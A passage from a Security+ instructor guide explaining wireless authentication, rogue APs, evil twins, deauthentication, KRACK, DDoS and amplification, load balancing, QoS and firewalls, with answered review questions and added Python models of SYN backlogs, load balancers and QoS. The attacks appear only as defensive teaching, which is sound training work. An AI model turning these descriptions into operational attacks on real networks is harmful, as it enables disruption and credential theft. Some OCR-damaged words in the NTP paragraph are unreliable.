In Protected Extensible Authentication Protocol (PEAP), as with EAP-TLS, an encrypted tunnel is established between the supplicant and authentication server, but PEAP only requires a server-side public key certificate. The supplicant does not require a certificate. With the server authenticated to the supplicant, user authentication can then take place through the secure tunnel with protection against sniffing, password guessing/dictionary, and on-path attacks. The user authentication method (also referred to as the inner method) can use either MS-CHAPv2 or EAP-GTC. The Generic Token Card (GTC) method transfers a token for authentication against a network directory or using a one-time password mechanism.

EAP with Tunneled TLS (EAP-TTLS)

EAP-Tunneled TLS (EAP-TTLS) is similar to PEAP. It uses a server-side certificate to establish a protected tunnel through which the user's authentication credentials can be transmitted to the authentication server. The main distinction from PEAP is that EAP-TTLS can use any inner authentication protocol (PAP or CHAP, for instance), while PEAP must use EAP-MSCHAP or EAP-GTC.

EAP with Flexible Authentication via Secure Tunneling (EAP-FAST)

EAP with Flexible Authentication via Secure Tunneling (EAP-FAST) is similar to PEAP, but instead of using a certificate to set up the tunnel, it uses a Protected Access Credential (PAC), which is generated for each user from the authentication server's master key. The problem with EAP-FAST is in distributing (provisioning) the PAC securely to each user requiring access. The PAC can either be distributed via an out-of-band method or via a server with a digital certificate (but in the latter case, EAP-FAST does not offer much advantage over using PEAP). Alternatively, the PAC can be delivered via anonymous Diffie-Hellman key exchange. The problem here is that there is nothing to authenticate the access point to the user. A rogue access point could obtain enough of the user credential to perform an ASLEAP password cracking attack (techrepublic.com/article/ultimate-wireless-security-guide-a-primer-on-cisco-eap-fast-authentication).

Show Slide(s): RADIUS Federation

RADIUS Federation

Most implementations of EAP use a RADIUS server to validate the authentication credentials for each user (supplicant). RADIUS federation means that multiple organizations allow access to one another's users by joining their RADIUS servers into a RADIUS hierarchy or mesh. For example, when Bob from widget.foo needs to log on to grommet.foo's network, the RADIUS server at grommet.foo recognizes that Bob is not a local user but has been granted access rights and routes the request to widget.foo's RADIUS server.

One example of RADIUS federation is the eduroam network (eduroam.org), which allows students of universities from several different countries to log on to the networks of any of the participating institutions using the credentials stored by their "home" university.

Show Slide(s): Rogue Access Points and Evil Twins

Rogue Access Points and Evil Twins

Teaching Tip: Stress the importance of disabling unused connections and services and scanning for rogue systems.

A rogue access point is one that has been installed on the network without authorization, whether with malicious intent or not. It is vital to periodically survey the site to detect rogue APs. A malicious user can set up such an access point with something as basic as a smartphone with tethering capabilities, and a non-malicious user could enable such an access point by accident. If connected to a LAN without security, an unauthorized AP creates a backdoor through which to attack the network. A rogue AP could also be used to capture user logon attempts, allow man-in-the-middle attacks, and allow access to private information.

A rogue AP masquerading as a legitimate one is called an evil twin. An evil twin might just have a similar name (SSID) to the legitimate one, or the attacker might use some DoS technique to overcome the legitimate AP. This attack will not succeed if authentication security is enabled on the AP, unless the attacker also knows the details of the authentication method. However, the evil twin might be able to harvest authentication information from users entering their credentials by mistake.

Surveying Wi-Fi networks using Cambium Networks (formerly Xirrus) Wi-Fi Inspector. Note the presence of print devices configured with open authentication (no security) and a smart TV appliance (requiring authentication). (Screenshot used with permission from Xirrus.)

A rogue hardware AP can be identified through physical inspections. There are also various Wi-Fi analyzers and monitoring systems that can detect rogue APs, including inSSIDer (metageek.com/products/inssider), Kismet (kismetwireless.net), and Cambium Networks (formerly Xirrus) Wi-Fi Inspector (cambiumnetworks.com/products/software/wifi-designer-and-wifi-inspector).

Show Slide(s): Disassociation and Replay Attacks

Disassociation and Replay Attacks

Teaching Tip: While the syllabus mentions the IV attack, as WEP is completely obsolete, focus on replay and key recovery attacks generally.

The use of a rogue AP may be coupled with a deauthentication attack. This sends a stream of spoofed frames to cause a client to deauthenticate from an AP. The deauth frames spoof the MAC address of the target station. This might allow the attacker to perform a replay attack aimed at recovering the network key or interpose a rogue AP. A similar attack hits the target with disassociation packets, rather than fully deauthenticating the station. A disassociated station is not completely disconnected, but neither can it communicate on the network until it reassociates. Both attacks may also be used to perform a denial of service attack against the wireless infrastructure. The attacks can be mitigated if the wireless infrastructure supports Management Frame Protection (MFP/802.11w). Both the AP and clients must be configured to support MFP.

Pre-shared key authentication is vulnerable to various types of replay attack that aim to capture the hash of the passphrase when a wireless station associates with an access point. Once the hash is captured it can be subjected to offline brute force and dictionary cracking. In WEP, these are referred to as initialization vector (IV) attacks, because they exploit flaws in the mechanism that is supposed to ensure a unique keystream, given the same key. A type of replay attack is used to make the access point generate lots of packets, usually by deauthenticating a station, capturing its encrypted ARP packet, and replaying this rapidly, causing the AP to cycle through IV values quickly, revealing the hash part.

WPA and WPA2 are not vulnerable to IV attacks, but a serious vulnerability has been discovered (krackattacks.com). A KRACK attack uses a replay mechanism that targets the 4-way handshake. KRACK is effective regardless of whether the authentication mechanism is personal or enterprise. It is important to ensure both clients and access points are fully patched against such attacks.

Show Slide(s): Jamming Attacks

Jamming Attacks

A wireless network can be disrupted by interference from other radio sources. These are often unintentional, but it is also possible for an attacker to purposefully jam an access point. This might be done simply to disrupt services or to position an evil twin on the network with the hope of stealing data. A Wi-Fi jamming attack can be performed by setting up an AP with a stronger signal. Wi-Fi jamming devices are also widely available, though they are often illegal to use and sometimes to sell. Such devices can be very small, but the attacker still needs to gain fairly close physical proximity to the wireless network.

The only ways to defeat a jamming attack are either to locate the offending radio source and disable it, or to boost the signal from the legitimate equipment. APs for home and small business use are not often configurable, but the more advanced wireless access points, such as Cisco's Aironet series, support configurable power level controls. The source of interference can be detected using a spectrum analyzer. Unlike a Wi-Fi analyzer, a spectrum analyzer must use a special radio receiver (Wi-Fi adapters filter out anything that isn't a Wi-Fi signal). They are usually supplied as handheld units with a directional antenna, so that the exact location of the interference can be pinpointed.

Review Activity:
Secure Wireless Infrastructure

Answer the following questions:

1. True or false? Band selection has a critical impact on all aspects of the security of a wireless network?

False—band selection can affect availability and performance but does not have an impact in terms of either confidentiality or integrity.

2. The network manager is recommending the use of "thin" access points to implement the wireless network. What additional appliance or software is required and what security advantages should this have?

You need a wireless controller to configure and manage the access points. This makes each access point more tamper-proof as there is no local administration interface. Configuration errors should also be easier to identify.

3. What is a pre-shared key?

This is a type of group authentication used when the infrastructure for authenticating securely (via RADIUS, for instance) is not available. The system depends on the strength of the passphrase used for the key.

4. Is WPS a suitable authentication method for enterprise networks?

No, an enterprise network will use RADIUS authentication. WPS uses PSK and there are weaknesses in the protocol.

5. You want to deploy a wireless network where only clients with domain-issued digital certificates can join the network. What type of authentication mechanism is suitable?

EAP-TLS is the best choice because it requires that both server and client be installed with valid certificates.

6. John is given a laptop for official use and is on a business trip. When he arrives at his hotel, he turns on his laptop and finds a wireless access point with the name of the hotel, which he connects to for sending official communications. He may become a victim of which wireless threat?

Evil twin.
Topic 9D
Implement Load Balancers

EXAM OBJECTIVES COVERED

1.4 Given a scenario, analyze potential indicators associated with network attacks
3.3 Given a scenario, implement secure network designs

Teaching Tip: As with the wireless topic, we take the opportunity to look at both a class of attack (DDoS) and a principal control to mitigate it (load balancing).

A denial of service (DoS) attack can be extremely destructive and very difficult to mitigate. As a network security professional, it is vital for you to be able to compare and contrast DoS and distributed DoS (DDoS) methods and to be able to recommend and configure load balancing technologies that can make networks more resilient to these attacks.

Show Slide(s): Distributed Denial of Service Attacks

Distributed Denial of Service Attacks

Teaching Tip: Point out that botnets can perform almost any function. Spam, phishing, and cryptojacking are probably more typical than DDoS. Stress that malware creation has become professionalized and now forms a substantial shadow economy. Refer students to the following analysis of the Mirai botnet as an example: imperva.com/blog/malware-analysis-mirai-ddos-botnet.

Most denial of service (DoS) attacks against websites and gateways are distributed DoS (DDoS). This means that the attack is launched from multiple hosts simultaneously. Typically, a threat actor will compromise machines to use as handlers in a command and control network. The handlers are used to compromise hundreds or thousands or millions of hosts with DoS tools (bots) forming a botnet.

Some types of DDoS attacks simply aim to consume network bandwidth, denying it to legitimate hosts, by using overwhelming numbers of bots. Others cause resource exhaustion on the hosts' processing requests, consuming CPU cycles and memory. This delays processing of legitimate traffic and could potentially crash the host system completely. For example, a SYN flood attack works by withholding the client's ACK packet during TCP's three-way handshake. Typically the client's IP address is spoofed, meaning that an invalid or random IP is entered so the server's SYN/ACK packet is misdirected. A server, router, or firewall can maintain a queue of pending connections, recorded in its state table. When it does not receive an ACK packet from the client, it resends the SYN/ACK packet a set number of times before timing out the connection. The problem is that a server may only be able to manage a limited number of pending connections, which the DoS attack quickly fills up. This means that the server is unable to respond to genuine traffic.
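A toy model of the pending-connection queue described above, added here as an illustration (not code from the guide). It shows why the number of half-open slots divided by the SYN/ACK retransmit timeout bounds the flood rate a server can absorb, and how the retransmit count changes that bound; the table size, retry count and packet rates are constructed values, not vendor defaults.

```python
"""Model of a TCP listen backlog under a SYN flood (added example, not from the guide).

The server records each half-open connection in its state table, sends a SYN/ACK and
retransmits it a fixed number of times with a doubling timeout before giving up. Spoofed
SYNs never complete the handshake, so each one holds a slot for the whole timeout and
genuine clients are refused once the table is full.
"""
from dataclasses import dataclass, field


def synack_timeout(synack_retries: int, base_rto: float = 1.0) -> float:
    """Seconds a half-open entry survives: first SYN/ACK plus retransmits at 1, 2, 4, ... x RTO."""
    return sum(base_rto * 2 ** i for i in range(synack_retries + 1))


def sustainable_syn_rate(max_entries: int, synack_retries: int) -> float:
    """Half-open connections per second the table absorbs without filling (Little's law)."""
    return max_entries / synack_timeout(synack_retries)


@dataclass
class SynBacklog:
    """Pending-connection queue: (src_ip, src_port) -> time at which the entry times out."""
    max_entries: int
    synack_retries: int
    pending: dict = field(default_factory=dict)
    refused_genuine: int = 0
    completed: int = 0

    def expire(self, now: float) -> None:
        """Drop entries whose last SYN/ACK retransmit has timed out."""
        self.pending = {src: t for src, t in self.pending.items() if t > now}

    def on_syn(self, src: tuple, now: float, genuine: bool = False) -> bool:
        """Admit a SYN if a slot is free; returns False when the table is full."""
        self.expire(now)
        if len(self.pending) >= self.max_entries:
            if genuine:
                self.refused_genuine += 1
            return False
        self.pending[src] = now + synack_timeout(self.synack_retries)
        return True

    def on_ack(self, src: tuple, now: float) -> bool:
        """The final ACK of the handshake frees the slot."""
        if src in self.pending and self.pending[src] > now:
            del self.pending[src]
            self.completed += 1
            return True
        return False


def simulate(max_entries: int, synack_retries: int, flood_pps: int,
             seconds: int = 120) -> SynBacklog:
    """Run `flood_pps` spoofed SYNs per second alongside one genuine client per second."""
    table = SynBacklog(max_entries, synack_retries)
    spoofed = 0
    for t in range(seconds):
        for _ in range(flood_pps):
            # Constructed spoofed source (TEST-NET-2 address, unique port): the SYN/ACK
            # is misdirected, so no ACK ever arrives and the slot is held until timeout.
            table.on_syn((f"198.51.100.{spoofed % 256}", 1024 + spoofed // 256), t)
            spoofed += 1
        client = ("203.0.113.10", 40000 + t)   # genuine client; completes the handshake
        if table.on_syn(client, t + 0.5, genuine=True):
            table.on_ack(client, t + 0.6)
    return table


if __name__ == "__main__":
    for retries in (5, 1):
        result = simulate(128, retries, flood_pps=10)
        print(f"retries={retries} timeout={synack_timeout(retries):.0f}s "
              f"capacity={sustainable_syn_rate(128, retries):.1f}/s "
              f"completed={result.completed} refused={result.refused_genuine}")
```

With 128 slots and five retransmits (a 63-second hold per entry) a flood of only 10 SYNs per second refuses nearly every genuine client; the same flood is absorbed when an entry is held for one retransmit, which is the trade-off a server makes between tolerating lossy clients and resisting this attack.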
Show Slide(s): Amplification, Application, and OT Attacks

Amplification, Application, and OT Attacks

In a distributed reflection DoS (DRDoS) or amplification SYN flood attack, the threat actor spoofs the victim's IP address and attempts to open connections with multiple servers. Those servers direct their SYN/ACK responses to the victim server. This rapidly consumes the victim's available bandwidth.

Application Attacks

Teaching Tip: We'll be revisiting OT when covering embedded systems in Lesson 12.

Where a network attack uses low-level techniques, such as SYN or SYN/ACK flooding, an application attack targets vulnerabilities in the headers and payloads of specific application protocols. For example, one type of amplification attack targets DNS services with bogus queries. One of the advantages of this technique is that while the request is small, the response to a DNS query can be made to include a lot of information, so this is a very effective way of overwhelming the bandwidth of the victim network with much more limited resources on the attacker's botnet.

Lesson 9: Implementing Secure Network Designs | Topic 9D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
248 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

The Network Time Protocol (NTP) can be abused in a similar way. NT helps servers
on a network and on the Internet to keep the correct time. It is vital for many protocols
and security mechanisms that servers and clients be synchroni ed. ne NT uery
monlist can be used to generate a response containing a list of the last machines
that the NT server has contacted. As with the amplification attac , this allows a
short request to direct a long response at the victim network.

Operational Technology (OT) Attacks

An operational technology (OT) network is established between embedded systems
devices and their controllers. The term "operational" is used because these systems
monitor and control physical electromechanical components, such as valves, motors,
electrical switches, gauges, and sensors. DDoS attacks against the controllers in such
networks can use the same techniques as against computer networks. Also, because
of the limited processing ability of some controller types, older DDoS techniques, such
as Smurf (cloudflare.com/learning/ddos/smurf-ddos-attack) or Ping of Death (imperva.
com/learn/application-security/ping-of-death), can continue to be effective against
embedded systems. The limited resources of these devices mean that DDoS can
rapidly overwhelm available memory or CPU time.

As well as being the target of an attack, embedded systems might be used as bots. Any type
of Internet-enabled device is vulnerable to compromise. This includes web-enabled cameras,
SOHO routers, and smart TVs and other appliances. This is referred to as an Internet of
Things (IoT) botnet.

Show Slide(s): Distributed Denial of Service Attack Mitigation

Distributed Denial of Service Attack Mitigation

DDoS attacks can be diagnosed by traffic spikes that have no legitimate explanation,
but can usually only be counteracted by providing high availability services, such as
load balancing and cluster services. In some cases, a stateful firewall can detect a DDoS
attack and automatically block the source. However, for many of the techniques used
in DDoS attacks, the source addresses will be randomly spoofed or launched by bots,
making it difficult to detect the source of the attack.

Dropping traffic from blacklisted IP ranges using Security Onion IDS.
(Screenshot used with permission from Security Onion.)


When a network is faced with a DDoS or similar flooding attack, an ISP can use either an
access control list (ACL) or a blackhole to drop packets for the affected IP address(es). A
blackhole is an area of the network that cannot reach any other part of the network. The
blackhole option is preferred, as evaluating each packet in a multi-gigabit stream against
ACLs overwhelms the processing resources available. A standard method of doing this
with border gateway protocol (BGP) routing is called a remotely triggered blackhole
(RTBH) (cisco.com/c/dam/en_us/about/security/intelligence/blackhole.pdf). The blackhole
also makes the attack less damaging to the ISP's other customers. With both approaches,
legitimate traffic is discarded along with the DDoS packets.

Another option is to use sinkhole routing so that the traffic flooding a particular IP address
is routed to a different network where it can be analyzed. Potentially some legitimate traffic
could be allowed through, but the real advantage is to identify the source of the attack
and devise rules to filter it. The target can then use low TTL DNS records to change the IP
address advertised for the service and try to allow legitimate traffic past the flood.

There are cloud DDoS mitigation services that can act as sinkhole network providers and try
to scrub flooded traffic.

Show Slide(s): Load Balancing

Load Balancing

A load balancer distributes client requests across available server nodes in a farm or
pool. This is used to provision services that can scale from light to heavy loads, and to
provide mitigation against DDoS attacks. A load balancer also provides fault tolerance. If
there are multiple servers available in a farm, all addressed by a single name/IP address
via a load balancer, then if a single server fails, client requests can be routed to another
server in the farm. You can use a load balancer in any situation where you have multiple
servers providing the same function. Examples include web servers, front-end email
servers, and web conferencing, A/V conferencing, or streaming media servers.

There are two main types of load balancers:

• Layer 4 load balancer: basic load balancers make forwarding decisions on IP
address and TCP/UDP port values, working at the transport layer of the OSI model.

• Layer 7 load balancer (content switch): as web applications have become more
complex, modern load balancers need to be able to make forwarding decisions
based on application-level data, such as a request for a particular URL or data types
like video or audio streaming. This requires more complex logic, but the processing
power of modern appliances is sufficient to deal with this.

Topology of basic load balancing architecture. (Images © 123RF.com.)


Scheduling

The scheduling algorithm is the code and metrics that determine which node is
selected for processing each incoming request. The simplest type of scheduling is
called round robin; this just means picking the next node. Other methods include
picking the node with the fewest connections or the best response time. Each method
can also be weighted, using administrator-set preferences or dynamic load information
or both.

The load balancer must also use some type of heartbeat or health check probe to verify
whether each node is available and under load or not. Layer 4 load balancers can only
make basic connectivity tests while layer 7 appliances can test the application's state,
as opposed to only verifying host availability.

Source IP Affinity and Session Persistence

When a client device has established a session with a particular node in the server
farm, it may be necessary to continue to use that connection for the duration of the
session. Source IP or session affinity is a layer 4 approach to handling user sessions. It
means that when a client establishes a session, it becomes stuck to the node that first
accepted the request.

An application-layer load balancer can use persistence to keep a client connected to a
session. Persistence typically works by setting a cookie, either on the node or injected
by the load balancer. This can be more reliable than source IP affinity, but requires the
browser to accept the cookie.
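To make the scheduling, health check, source IP affinity and cookie persistence ideas concrete, here is an added Python model of a load balancer (not code from the guide or from any product). It assumes a persistence cookie named SERVERID that carries the node name, which is a constructed convention; real appliances use their own cookie names and may encrypt the value.

```python
import hashlib


class Node:
    """A server in the farm. weight > 1 lets a node take proportionally more load."""

    def __init__(self, name, weight=1):
        self.name = name
        self.weight = weight
        self.healthy = True      # set by the health check probe
        self.connections = 0     # active sessions, used by least-connections


class LoadBalancer:
    COOKIE = "SERVERID"  # persistence cookie injected by the balancer (constructed name)

    def __init__(self, nodes, method="round_robin"):
        self.nodes = nodes
        self.method = method
        self._rr_position = 0

    def health_check(self, results):
        """Apply probe results: {node_name: True/False}. Unhealthy nodes leave the pool."""
        for node in self.nodes:
            if node.name in results:
                node.healthy = results[node.name]

    def pool(self):
        live = [n for n in self.nodes if n.healthy]
        if not live:
            raise RuntimeError("no healthy nodes in the farm")
        return live

    def schedule(self):
        """Pick a node with the configured scheduling algorithm."""
        live = self.pool()
        if self.method == "round_robin":
            node = live[self._rr_position % len(live)]
            self._rr_position += 1
            return node
        if self.method == "least_connections":
            # Weighted: a node with weight 2 may carry twice as many sessions.
            return min(live, key=lambda n: n.connections / n.weight)
        raise ValueError(f"unknown method {self.method}")

    def by_source_ip(self, client_ip):
        """Layer 4 source IP affinity: the same client always hashes to the same node."""
        live = self.pool()
        digest = hashlib.sha256(client_ip.encode()).digest()
        return live[int.from_bytes(digest[:4], "big") % len(live)]

    def handle_request(self, client_ip, cookies=None):
        """Layer 7 persistence: honour SERVERID if that node is still healthy,
        otherwise schedule afresh. Returns (node_name, cookie_to_set_or_None)."""
        cookies = cookies or {}
        wanted = cookies.get(self.COOKIE)
        node = next((n for n in self.pool() if n.name == wanted), None)
        set_cookie = None
        if node is None:
            node = self.schedule()
            set_cookie = {self.COOKIE: node.name}
        node.connections += 1
        return node.name, set_cookie

    def release(self, node_name):
        """Called when a session ends so least-connections stays accurate."""
        for node in self.nodes:
            if node.name == node_name and node.connections > 0:
                node.connections -= 1
```

Note the failure mode the text alludes to: a persistence cookie only pins a client while that node passes its health check. Once the node is marked down, the client is rescheduled and receives a fresh cookie, which is why persistence is more reliable than raw affinity but still depends on the health probe.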

Show Slide(s): Clustering

Clustering

Teaching Tip: Where a load balancer distributes client requests between available
nodes, clustering enables load balancing "within" a group of servers.

Where load balancing distributes traffic between independent processing nodes,
clustering allows multiple redundant processing nodes that share data with one
another to accept connections. This provides redundancy. If one of the nodes in the
cluster stops working, connections can failover to a working node. To clients, the
cluster appears to be a single server.

Virtual IP

For example, you might want to provision two load balancer appliances so that if
one fails, the other can still handle client connections. Unlike load balancing with a
single appliance, the public IP used to access the service is shared between the two
instances in the cluster. This is referred to as a virtual IP or shared or floating address.
The instances are configured with a private connection, on which each is identified by
its real IP address. This connection runs some type of redundancy protocol, such as
Common Address Redundancy Protocol (CARP), that enables the active node to own
the virtual IP and respond to connections. The redundancy protocol also implements
a heartbeat mechanism to allow failover to the passive node if the active one should
suffer a fault.


Topology of clustered load balancing architecture. (Images © 123RF.com.)

Active/Passive (A/P) and Active/Active (A/A) Clustering

In the previous example, if one node is active, the other is passive. This is referred to
as active/passive clustering. The major advantage of active/passive configurations is
that performance is not adversely affected during failover. However, the hardware and
operating system costs are higher because of the unused capacity.

An active/active cluster means that both nodes are processing connections
concurrently. This allows the administrator to use the maximum capacity from
the available hardware while all nodes are functional. In the event of a failover
the workload of the failed node is immediately and transparently shifted onto the
remaining node. At this time, the workload on the remaining nodes is higher and
performance is degraded.

In a standard active/passive configuration, each active node must be matched by a passive
node. There are N+1 and N+M configurations that provision fewer passive nodes than active
nodes, to reduce costs.

Application Clustering

Clustering is also very commonly used to provision fault tolerant application services.
If an application server suffers a fault in the middle of a session, the session state data
will be lost. Application clustering allows servers in the cluster to communicate session
information to one another. For example, if a user logs in on one instance, the next
session can start on another instance, and the new server can access the cookies or
other information used to establish the login.


Show Slide(s): Quality of Service (QoS)

Quality of Service

Teaching Tip: You might also want to mention multiprotocol label switching (MPLS) as a
common means of implementing QoS. This is in the syllabus acronym list, but is only
covered as a glossary term in this course.

Most network appliances process packets on a best effort and first in, first out (FIFO)
basis. Quality of Service (QoS) is a framework for prioritizing traffic based on its
characteristics. It is primarily used to support voice and video applications that require
a minimum level of bandwidth and are sensitive to latency and jitter. Latency is the
time it takes for a transmission to reach the recipient, measured in milliseconds (ms).
Jitter is defined as being a variation in the delay, or an inconsistent rate of packet
delivery. FIFO-based delivery makes it more likely that other applications sharing the
same network will cause loss of bandwidth and increase latency and jitter for a real-
time service.

Implementing QoS is a complex project, as there are many different ways to do it, and
many different protocols and appliances involved. In overview, a QoS implementation
could work as follows:

1. The organization performs application discovery to identify bandwidth, latency,
and jitter thresholds of the protocols in use and determine their relative priority.
The applications are then mapped to standard class of service (CoS) codes at
layer 2 and layer 3. These codes are configured across the range of hosts and
intermediate systems that handle QoS traffic.

2. A QoS-compatible endpoint device or application uses the DiffServ field in the
IP header (layer 3) and adds an 802.1p field to the Ethernet header (layer 2) to
indicate that the packet should be treated as priority traffic (marking). It transmits
the frame to the switch.

3. If the switch supports QoS, it uses the 802.1p header to prioritize the frame. Note
that it can only do this by holding a queue of outgoing traffic and delaying non-
priority frames. If the queue is full, a traffic policing policy must state whether
non-priority frames should be dropped, or whether the queue should be cleared
at the expense of reducing QoS.

4. A similar process occurs at routers and load balancers on the network edge,
though they can inspect the DiffServ IP packet header, rather than having to rely
on the more limited 802.1p header. Note that prioritization always takes place on
the outbound interface, with low priority traffic being held in a queue.

There are many variations on this process. Modern layer 2 switches can inspect DSCP
values, rather than relying on 802.1p tagging, for instance. QoS may need to take place over
wireless networks, which use a different tagging mechanism. There is also a wholly different
approach to QoS called IntServ. This uses the Resource Reservation Protocol (RSVP) to
negotiate a link with the performance characteristics required by the application or policy.

QoS marking introduces the potential for DoS attacks. If a threat actor can craft
packets that are treated as high priority and send them at a high rate, the network
can be overwhelmed. Part of QoS involves identifying trust boundaries to establish a
legitimate authority for marking traffic. You should also ensure that there is always
sufficient bandwidth for security-critical monitoring data and network management/
configuration traffic.
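The four-step overview and the trust boundary warning above can be walked through in code. The following Python model is an added example, not from the guide: it marks packets with a DSCP value and derives the 802.1p priority (using the common default of taking the three class-selector bits), resets markings that arrive on an untrusted port, and models an outbound queue whose policing policy either drops non-priority frames or clears the queue. The DSCP code points are the standard ones (CS0, AF21, AF41, EF); the application-to-class mapping and queue sizes are constructed.

```python
from collections import deque

# Standard DSCP code points (class selector CS0, assured forwarding AF, expedited forwarding EF).
DSCP = {"CS0": 0, "AF21": 18, "AF41": 34, "EF": 46}

# Step 1 output, constructed for illustration: application discovery maps each
# application to a class of service. Voice gets EF, video AF41, bulk data AF21.
CLASS_MAP = {"voice": "EF", "video": "AF41", "bulk": "AF21", "web": "CS0"}


def mark(app):
    """Step 2: endpoint marking. Returns (tos_byte, pcp).

    DSCP occupies the upper 6 bits of the IPv4 ToS / IPv6 Traffic Class byte (layer 3).
    The 802.1p PCP (layer 2) is derived from DSCP's three class-selector bits, a common
    default mapping on switches and endpoints.
    """
    dscp = DSCP[CLASS_MAP.get(app, "CS0")]
    return dscp << 2, dscp >> 3


def dscp_of(tos):
    return tos >> 2


def ingress_trust(tos, port_trusted):
    """Trust boundary: a marking arriving on an untrusted port is reset to CS0 so a
    host cannot promote its own traffic (the DoS risk the text describes)."""
    return tos if port_trusted else 0


class EgressQueue:
    """Steps 3 and 4: the outbound interface holds frames and sends priority ones first.

    policy="drop": when full, non-priority frames are discarded (a queued one is evicted
    to admit an arriving priority frame). policy="clear": when full, the whole queue is
    flushed, which frees the interface at the cost of QoS for everything queued.
    """

    def __init__(self, capacity, policy="drop", priority_pcp=4):
        self.capacity, self.policy, self.priority_pcp = capacity, policy, priority_pcp
        self.high, self.low = deque(), deque()
        self.dropped = 0

    def __len__(self):
        return len(self.high) + len(self.low)

    def enqueue(self, tos, payload):
        pcp = dscp_of(tos) >> 3
        target = self.high if pcp >= self.priority_pcp else self.low
        if len(self) >= self.capacity:
            if self.policy == "clear":
                self.dropped += len(self)
                self.high.clear()
                self.low.clear()
            elif target is self.high and self.low:
                self.low.popleft()          # evict a non-priority frame to make room
                self.dropped += 1
            else:
                self.dropped += 1           # policed away: no room for this frame
                return False
        target.append(payload)
        return True

    def dequeue(self):
        queue = self.high if self.high else self.low
        return queue.popleft() if queue else None
```

Running the marking through ingress_trust with port_trusted=False is the whole point of the trust boundary: voice marked EF by a phone on an access port keeps its priority, while the same byte set by an arbitrary host on an untrusted port is reset to 0 before it reaches the egress queue.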

For more information, consider these case studies and design overviews from Microsoft
(docs.microsoft.com/en-us/skypeforbusiness/optimizing-your-network/expressroute-and-
qos-in-skype-for-business-online) and Cisco (cisco.com/c/en/us/td/docs/solutions/Enterprise/
WAN_and_MAN/QoS_SRND/QoS-SRND-Book/QoSIntro.html).


Review Activity:
Load Balancers

Answer the following questions:

1. Why are many network DoS attacks distributed?

Most attacks depend on overwhelming the victim. This typically requires a large
number of hosts, or bots.

2. What is an amplification attack?

Where the attacker spoofs the victim's IP in requests to several reflecting servers (often
DNS or NTP servers). The attacker crafts the request so that the reflecting servers
respond to the victim's IP with a large message, overwhelming the victim's bandwidth.

3. What is meant by scheduling in the context of load balancing?

The algorithm and metrics that determine which node a load balancer picks to handle a
request.

4. What mechanism provides the most reliable means of associating a client
with a particular server node when using load balancing?

Persistence is a layer 7 mechanism that works by injecting a session cookie. This is
generally more reliable than the layer 4 source IP affinity mechanism.

5. True or false? A virtual IP is a means by which two appliances can be put in a
fault tolerant configuration to respond to requests for the same IP address.

True.

6. What field provides traffic marking for a QoS system at layer 3?

Layer 3 refers to the DiffServ field in the IP header.


Lesson 9
Summary

Teaching Tip: Check that students are confident about the content that has been
covered. If there is time, re-visit any content examples that they have questions
about. If you have used all the available time for this lesson block, note the issues,
and schedule time for a review later in the course.

You should be able to use segmentation-based network designs and provision
switching, routing, Wi-Fi, and load balancing technologies for secure network access.

Guidelines for Implementing Secure Network Designs

Follow these guidelines when you implement designs for new or extended networks:

• Identify business workflows and the servers, clients, and protocols that support
them. Design segmented network zones or blocks that support the security
requirements, using VLANs, subnets, and firewall policies to implement the design.

• Accommodate special requirements within the design:

  • Demilitarized zone topologies for Internet-facing hosts.

  • East-west and zero trust designs for data centers.

  • Secure implementation of IPv6 addressing.

• Deploy switching and routing appliances and protocols to support each block,
accounting for loop protection, port security, and route security.

• Select an appropriate authentication mechanism for Wi-Fi networks:

  • Enterprise authentication with an EAP method (EAP-TLS, EAP-TTLS, or PEAP)
provides the best security.

  • Pre-shared key or personal authentication should be configured with a
sufficiently long passphrase, and use WPA3 if there are no compatibility issues.

  • Open authentication can be used for guest networks, so long as the risks are
understood.

• Evaluate risks from denial of service and design load balanced and clustered
services to provision high availability and fault tolerance.

• Evaluate requirements for quality of service mechanisms, such as supporting voice
over IP and conferencing.

Lesson 10
Implementing Network
Security Appliances

LESSON INTRODUCTION

Teaching Tip: Continuing the protecting infrastructure theme, this lesson looks at the
security appliances and software used to implement firewalls, proxy services,
intrusion detection/prevention, and logging/alerting.

In addition to the secure switching and routing appliances and protocols used to
implement network connectivity, the network infrastructure design must also include
security appliances to ensure confidentiality, integrity, and availability of services and
data. You should be able to distinguish the features of security and monitoring devices
and software and deploy these devices to appropriate locations in the network.

Lesson Objectives

In this lesson, you will:

• Implement firewalls and proxy servers.

• Implement network security monitoring.

• Summarize the use of SIEM.


Topic 10A
Implement Firewalls and Proxy Servers

EXAM OBJECTIVES COVERED
3.3 Given a scenario, implement secure network designs

Teaching Tip: Emphasize the different firewall and content filter types and the ways they
can be implemented on hosts and appliances for placement at different locations in
the network.

The firewall is one of the longest serving types of network security control, developed
to segregate some of the first Internet networks in the 1980s. Since those early
days, firewall types and functionality have both broadened and deepened. As a
network security professional, a very large part of your workday will be taken up with
implementing, configuring, and troubleshooting firewalls and proxies.

Show Slide(s): Packet Filtering Firewalls

Packet Filtering Firewalls

Packet filtering describes the earliest type of network firewall. All firewalls can still
perform this basic function.

Access Control Lists (ACLs)

Teaching Tip: Students need to be able to interpret firewall ACLs.

A packet filtering firewall is configured by specifying a group of rules, called an access
control list (ACL). Each rule defines a specific type of data packet and the appropriate
action to take when a packet matches the rule. An action can be either to deny (block
or drop the packet, and optionally log an event) or to accept (let the packet pass
through the firewall). A packet filtering firewall can inspect the headers of IP packets.
This means that rules can be based on the information found in those headers:

• IP filtering: accepting or denying traffic on the basis of its source and/or destination
IP address.

• Protocol ID/type (TCP, UDP, ICMP, routing protocols, and so on).

• Port filtering/security: accepting or denying a packet on the basis of source and
destination port numbers (TCP or UDP application type).

There may be additional functionality in some products, such as the ability to block
some types of ICMP/ping traffic but not others, or the ability to filter by hardware
(MAC) address. Another distinction that can be made is whether the firewall can control
only inbound traffic or both inbound and outbound traffic. This is also often referred to
as ingress and egress traffic or filtering. Controlling outbound traffic is useful because it
can block applications that have not been authorized to run on the network and defeat
malware, such as backdoors. Ingress and egress traffic is filtered using separate ACLs.

Stateless Operation

A basic packet filtering firewall is stateless. This means that it does not preserve
information about network sessions. Each packet is analyzed independently, with
no record of previously processed packets. This type of filtering requires the least
processing effort, but it can be vulnerable to attacks that are spread over a sequence
of packets. A stateless firewall can also introduce problems in traffic flow, especially
when some sort of load balancing is being used or when clients or servers need to use
dynamically assigned ports.


Show Slide(s): Stateful Inspection Firewalls

Stateful Inspection Firewalls

Teaching Tip: Note that very few, if any, firewalls are wholly stateless anymore. The
principal distinction is between firewalls that track state at the transport layer and
those that can monitor application sessions.

